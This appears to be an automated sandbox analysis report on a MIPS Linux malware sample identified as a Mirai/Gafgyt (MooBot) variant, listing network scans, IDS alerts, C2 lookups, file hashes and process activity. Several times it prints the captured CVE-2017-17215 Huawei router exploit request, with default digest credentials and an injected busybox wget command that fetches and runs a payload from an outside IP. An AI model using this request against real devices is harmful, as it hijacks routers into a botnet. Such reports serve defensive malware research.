            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.160.82.241:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.235.128.151:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 96.169.98.6:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 8.43.145.96:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.209.29.64:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.201.151.204:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.180.58.53:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 94.16.195.36:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.62.159.163:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.108.19.94:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.231.217.100:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.211.254.46:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.127.4.73:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.34.97.130:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.29.31.206:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.153.187.167:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.55.46.154:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.253.143.146:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.79.13.241:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.87.60.94:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.98.16.152:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.141.167.44:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.194.249.131:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.29.65.171:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.69.70.192:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 84.156.156.35:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.237.193.154:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.235.87.126:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.129.85.115:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.160.95.149:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.207.91.11:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.245.244.59:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.113.151.221:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 184.110.45.237:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.36.135.153:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.116.177.193:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.86.232.40:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.132.122.89:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.2.218.117:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.230.8.131:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.98.244.39:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.179.150.80:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.240.183.240:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.120.126.5:37215
            Source: global traffic
            HTTP traffic detected:
            POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Connection: keep-alive
            Accept: */*
            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
            Content-Length: 456
            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global traffic
            HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Connection: keep-alive
            Accept: */*
            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
            Content-Length: 456
            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
            Source: unknownTCP traffic detected without corresponding DNS query: 54.134.165.245
            Source: unknownTCP traffic detected without corresponding DNS query: 41.254.115.250
            Source: unknownTCP traffic detected without corresponding DNS query: 41.170.162.96
            Source: unknownTCP traffic detected without corresponding DNS query: 41.166.16.10
            Source: mbl5k2b7z8.elf String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: mbl5k2b7z8.elf String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknown HTTP traffic detected:
            POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Connection: keep-alive
            Accept: */*
            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
            Content-Length: 456
            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: unknown DNS traffic detected: queries for: test.zxyes.xyz

            System Summary

            Source: mbl5k2b7z8.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 6231.1.00007f8304400000.00007f8304414000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: mbl5k2b7z8.elf PID: 6231, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: mbl5k2b7z8.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 6231.1.00007f8304400000.00007f8304414000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: mbl5k2b7z8.elf PID: 6231, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: ELF static info symbol of initial sample .symtab present: no
            Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sample String containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sample String containing 'busybox' found: bin/busybox
            Source: Initial sample String containing 'busybox' found: /bin/busybox
            Source: Initial sample String containing 'busybox' found: f%s:%dwebservbinbin/busyboxbin/watchdogbin/systemd/bin/busybox/bin/watchdog/bin/systemdw5q6he3dbrsgmclkiu4to18npavj702f
            Source: classification engine Classification label: mal96.troj.linELF@0/0@1/0

            Persistence and Installation Behavior

            Source: /bin/sh (PID: 6238) Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/busybox
            Source: /bin/sh (PID: 6236) Mkdir executable: /usr/bin/mkdir -> mkdir bin
            Source: /bin/sh (PID: 6238) Chmod executable: /usr/bin/chmod -> chmod 777 bin/busybox
            Source: /tmp/mbl5k2b7z8.elf (PID: 6241) File opened: /proc/1582/cmdline
            Source: /usr/bin/chmod (PID: 6238) File: /tmp/bin/busybox (bits: - usr: rwx grp: rwx all: rwx)
            Source: /tmp/mbl5k2b7z8.elf (PID: 6233) Shell command executed: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/mbl5k2b7z8.elf bin/busybox; chmod 777 bin/busybox"
            Source: /bin/sh (PID: 6235) Rm executable: /usr/bin/rm -> rm -rf bin/busybox

            Hooking and other Techniques for Hiding and Protection

            Source: unknown Network traffic detected: HTTP traffic on port 60670 -> 37215
            Source: unknown Network traffic detected: HTTP traffic on port 33478 -> 37215
            Source: unknown Network traffic detected: HTTP traffic on port 37215 -> 33478
            Source: unknown Network traffic detected: HTTP traffic on port 54264 -> 37215
            Source: unknown Network traffic detected: HTTP traffic on port 44838 -> 37215
            Source: unknown Network traffic detected: HTTP traffic on port 52512 -> 37215
            Source: unknown Network traffic detected: HTTP traffic on port 46706 -> 37215
            Source: unknown Network traffic detected: HTTP traffic on port 37215 -> 52512
            Source: unknown Network traffic detected: HTTP traffic on port 56602 -> 37215
            Source: unknown Network traffic detected: HTTP traffic on port 37215 -> 56602
            Source: unknown Network traffic detected: HTTP traffic on port 44448 -> 37215
            Source: unknown Network traffic detected: HTTP traffic on port 58890 -> 37215
            Source: unknown Network traffic detected: HTTP traffic on port 44552 -> 37215
            Source: unknown Network traffic detected: HTTP traffic on port 55072 -> 37215
            Source: /tmp/mbl5k2b7z8.elf (PID: 6231) Queries kernel information via 'uname':
            Source: mbl5k2b7z8.elf, 6231.1.0000560f2b174000.0000560f2b1fb000.rw-.sdmp Binary or memory string: V!/etc/qemu-binfmt/mips
            Source: mbl5k2b7z8.elf, 6231.1.0000560f2b174000.0000560f2b1fb000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mips
            Source: mbl5k2b7z8.elf, 6231.1.00007ffc335aa000.00007ffc335cb000.rw-.sdmp Binary or memory string: Rx86_64/usr/bin/qemu-mips/tmp/mbl5k2b7z8.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mbl5k2b7z8.elf
            Source: mbl5k2b7z8.elf, 6231.1.00007ffc335aa000.00007ffc335cb000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mips

            Stealing of Sensitive Information

            Source: Yara match File source: mbl5k2b7z8.elf, type: SAMPLE
            Source: Yara match File source: 6231.1.00007f8304400000.00007f8304414000.r-x.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: mbl5k2b7z8.elf PID: 6231, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match File source: mbl5k2b7z8.elf, type: SAMPLE
            Source: Yara match File source: 6231.1.00007f8304400000.00007f8304414000.r-x.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: mbl5k2b7z8.elf PID: 6231, type: MEMORYSTR
            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | 1 Scripting | Path Interception | Path Interception | 2 File and Directory Permissions Modification | 1 OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Scripting | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 11 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 File Deletion | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
            No configs have been found
            Behavior Graph (image not reproduced): ID: 830716, Sample: mbl5k2b7z8.elf, Startdate: 20/03/2023, Architecture: LINUX, Score: 96
            Source | Detection | Scanner | Label | Link
            mbl5k2b7z8.elf | 64% | ReversingLabs | Linux.Trojan.Mirai |
            mbl5k2b7z8.elf | 59% | Virustotal | | Browse
            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            test.zxyes.xyz | 195.133.40.202 | true | true | | unknown

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://schemas.xmlsoap.org/soap/encoding/ | mbl5k2b7z8.elf | false | | high
            http://schemas.xmlsoap.org/soap/envelope/ | mbl5k2b7z8.elf | false | | high
                  90.243.221.86
                  unknownUnited Kingdom
                  5378VodafoneGBfalse
                  157.101.64.14
                  unknownJapan2519VECTANTARTERIANetworksCorporationJPfalse
                  197.223.247.155
                  unknownEgypt
                  37069MOBINILEGfalse
                  197.131.139.241
                  unknownMorocco
                  6713IAM-ASMAfalse
                  197.249.217.5
                  unknownMozambique
                  25139TVCABO-ASEUfalse
                  47.39.49.244
                  unknownUnited States
                  20115CHARTER-20115USfalse
                  41.187.12.178
                  unknownEgypt
                  20928NOOR-ASEGfalse
                  41.168.23.240
                  unknownSouth Africa
                  36937Neotel-ASZAfalse
                  41.235.194.79
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  197.121.74.199
                  unknownEgypt
                  36992ETISALAT-MISREGfalse
                  157.253.237.105
                  unknownColombia
                  3603UniversitydeLosAndesCOfalse
                  41.39.34.249
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  197.41.93.128
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  41.246.44.154
                  unknownSouth Africa
                  5713SAIX-NETZAfalse
                  197.21.42.101
                  unknownTunisia
                  37693TUNISIANATNfalse
                  34.167.178.222
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  157.98.55.36
                  unknownUnited States
                  3527NIH-NETUSfalse
                  32.150.51.8
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  157.28.31.173
                  unknownItaly
                  8968BT-ITALIAITfalse
                  41.61.164.249
                  unknownSouth Africa
                  36943GridhostZAfalse
                  107.46.141.66
                  unknownUnited States
                  16567NETRIX-16567USfalse
                  41.33.29.216
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  No context
                  No created / dropped files found
                  File type: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                  Entropy (8bit): 5.442878534201549
                  TrID:
                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                  File name: mbl5k2b7z8.elf
                  File size: 84780
                  MD5: d7f3432247daa3564a2f9f282fd892ca
                  SHA1: 58ddd0d4593d6362f371acb8877671edb8463d99
                  SHA256: 686fb10624e0f6001922f5a7da9d6c10671b960e04da8cb6300bd81671d4407d
                  SHA512: 3a08fec1a6e3e892ff9f4e08cc2d1ed1fbc0c321c84440e82a34cb348e2e20456e1e508bf52c146d485765f46354daa041389a9ea722ec12d0ad5534a19c38e0
                  SSDEEP: 768:2ty6IP7M/kq0INRhfuN2Eo9tl/de2YIwHKRH0I84EH6UTU77ZDYovZ73x/nL8y89:Rakdn2Eo3ePu5GTgRYo99Be037Wj/
                  TLSH: 2B83A51E7E228FADF76D823147B74E25A69833C627E1D641E16CD6012E6034E641FFE8

                  ELF header

                  Class:
                  Data:
                  Version:
                  Machine:
                  Version Number:
                  Type:
                  OS/ABI:
                  ABI Version:
                  Entry Point Address:
                  Flags:
                  ELF Header Size:
                  Program Header Offset:
                  Program Header Size:
                  Number of Program Headers:
                  Section Header Offset:
                  Section Header Size:
                  Number of Section Headers:
                  Header String Table Index:
                  Name           Type      Address   Offset    Size     EntSize  Flags       Flags Description  Link  Info  Align
                                 NULL      0x0       0x0       0x0      0x0      0x0                            0     0     0
                  .init          PROGBITS  0x400094  0x94      0x8c     0x0      0x6         AX                 0     0     4
                  .text          PROGBITS  0x400120  0x120     0x115d0  0x0      0x6         AX                 0     0     16
                  .fini          PROGBITS  0x4116f0  0x116f0   0x5c     0x0      0x6         AX                 0     0     4
                  .rodata        PROGBITS  0x411750  0x11750   0x1f10   0x0      0x2         A                  0     0     16
                  .ctors         PROGBITS  0x454000  0x14000   0x8      0x0      0x3         WA                 0     0     4
                  .dtors         PROGBITS  0x454008  0x14008   0x8      0x0      0x3         WA                 0     0     4
                  .data.rel.ro   PROGBITS  0x454014  0x14014   0x44     0x0      0x3         WA                 0     0     4
                  .data          PROGBITS  0x454060  0x14060   0x3a0    0x0      0x3         WA                 0     0     16
                  .got           PROGBITS  0x454400  0x14400   0x498    0x4      0x10000003  WAp                0     0     16
                  .sbss          NOBITS    0x454898  0x14898   0x1c     0x0      0x10000003  WAp                0     0     4
                  .bss           NOBITS    0x4548c0  0x14898   0x2250   0x0      0x3         WA                 0     0     16
                  .mdebug.abi32  PROGBITS  0x9c6     0x14898   0x0      0x0      0x0                            0     0     1
                  .shstrtab      STRTAB    0x0       0x14898   0x64     0x0      0x0                            0     0     1
                  Type       Offset   Virtual Address  Physical Address  File Size  Memory Size  Entropy  Flags  Flags Description  Align    Prog Interpreter  Section Mappings
                  LOAD       0x0      0x400000         0x400000          0x13660    0x13660      5.5807   0x5    R E                0x10000                    .init .text .fini .rodata
                  LOAD       0x14000  0x454000         0x454000          0x898      0x2b10       3.8882   0x6    RW                 0x10000                    .ctors .dtors .data.rel.ro .data .got .sbss .bss
                  GNU_STACK  0x0      0x0              0x0               0x0        0x0          0.0000   0x7    RWE                0x4
                  Timestamp                 Protocol  SID      Message                                                                      Source Port  Dest Port  Source IP       Dest IP
                  03/20/23-16:24:46.219802  TCP       2030490  ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)  36176        56999      192.168.2.23    195.133.40.202
                  03/20/23-16:25:01.651288  TCP       2835222  ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)    60670        37215      192.168.2.23    163.18.94.240
                  03/20/23-16:25:13.708877  TCP       2030489  ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response                      56999        36176      195.133.40.202  192.168.2.23
                  03/20/23-16:25:15.146221  TCP       2835222  ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)    54264        37215      192.168.2.23    34.128.181.63
                  03/20/23-16:25:08.055278  TCP       2835222  ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)    33478        37215      192.168.2.23    41.37.71.18
                  Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name            Type            Class        DNS over HTTPS
                  Mar 20, 2023 16:24:46.162062883 CET  192.168.2.23  8.8.8.8  0xdcc8    Standard query (0)  test.zxyes.xyz  A (IP address)  IN (0x0001)  false

                  Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name            CName  Address         Type            Class        DNS over HTTPS
                  Mar 20, 2023 16:24:46.186434984 CET  8.8.8.8    192.168.2.23  0xdcc8    No error (0)  test.zxyes.xyz         195.133.40.202  A (IP address)  IN (0x0001)  false

                  System Behavior

                  Start time: 16:24:45
                  Start date: 20/03/2023
                  Path: /tmp/mbl5k2b7z8.elf
                  Arguments: /tmp/mbl5k2b7z8.elf
                  File size: 5777432 bytes
                  MD5 hash: 0083f1f0e77be34ad27f849842bbb00c

                  Start time: 16:24:45
                  Start date: 20/03/2023
                  Path: /tmp/mbl5k2b7z8.elf
                  Arguments: n/a
                  File size: 5777432 bytes
                  MD5 hash: 0083f1f0e77be34ad27f849842bbb00c

                  Start time: 16:24:45
                  Start date: 20/03/2023
                  Path: /bin/sh
                  Arguments: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/mbl5k2b7z8.elf bin/busybox; chmod 777 bin/busybox"
                  File size: 129816 bytes
                  MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

                  Start time: 16:24:45
                  Start date: 20/03/2023
                  Path: /bin/sh
                  Arguments: n/a
                  File size: 129816 bytes
                  MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

                  Start time: 16:24:45
                  Start date: 20/03/2023
                  Path: /usr/bin/rm
                  Arguments: rm -rf bin/busybox
                  File size: 72056 bytes
                  MD5 hash: aa2b5496fdbfd88e38791ab81f90b95b

                  Start time: 16:24:45
                  Start date: 20/03/2023
                  Path: /bin/sh
                  Arguments: n/a
                  File size: 129816 bytes
                  MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

                  Start time: 16:24:45
                  Start date: 20/03/2023
                  Path: /usr/bin/mkdir
                  Arguments: mkdir bin
                  File size: 88408 bytes
                  MD5 hash: 088c9d1df5a28ed16c726eca15964cb7

                  Start time: 16:24:45
                  Start date: 20/03/2023
                  Path: /bin/sh
                  Arguments: n/a
                  File size: 129816 bytes
                  MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

                  Start time: 16:24:45
                  Start date: 20/03/2023
                  Path: /usr/bin/mv
                  Arguments: mv /tmp/mbl5k2b7z8.elf bin/busybox
                  File size: 149888 bytes
                  MD5 hash: 504f0590fa482d4da070a702260e3716

                  Start time: 16:24:45
                  Start date: 20/03/2023
                  Path: /bin/sh
                  Arguments: n/a
                  File size: 129816 bytes
                  MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

                  Start time: 16:24:45
                  Start date: 20/03/2023
                  Path: /usr/bin/chmod
                  Arguments: chmod 777 bin/busybox
                  File size: 63864 bytes
                  MD5 hash: 739483b900c045ae1374d6f53a86a279

                  Start time: 16:24:45
                  Start date: 20/03/2023
                  Path: /tmp/mbl5k2b7z8.elf
                  Arguments: n/a
                  File size: 5777432 bytes
                  MD5 hash: 0083f1f0e77be34ad27f849842bbb00c

                  Start time: 16:24:45
                  Start date: 20/03/2023
                  Path: /tmp/mbl5k2b7z8.elf
                  Arguments: n/a
                  File size: 5777432 bytes
                  MD5 hash: 0083f1f0e77be34ad27f849842bbb00c

                  Start time: 16:24:45
                  Start date: 20/03/2023
                  Path: /tmp/mbl5k2b7z8.elf
                  Arguments: n/a
                  File size: 5777432 bytes
                  MD5 hash: 0083f1f0e77be34ad27f849842bbb00c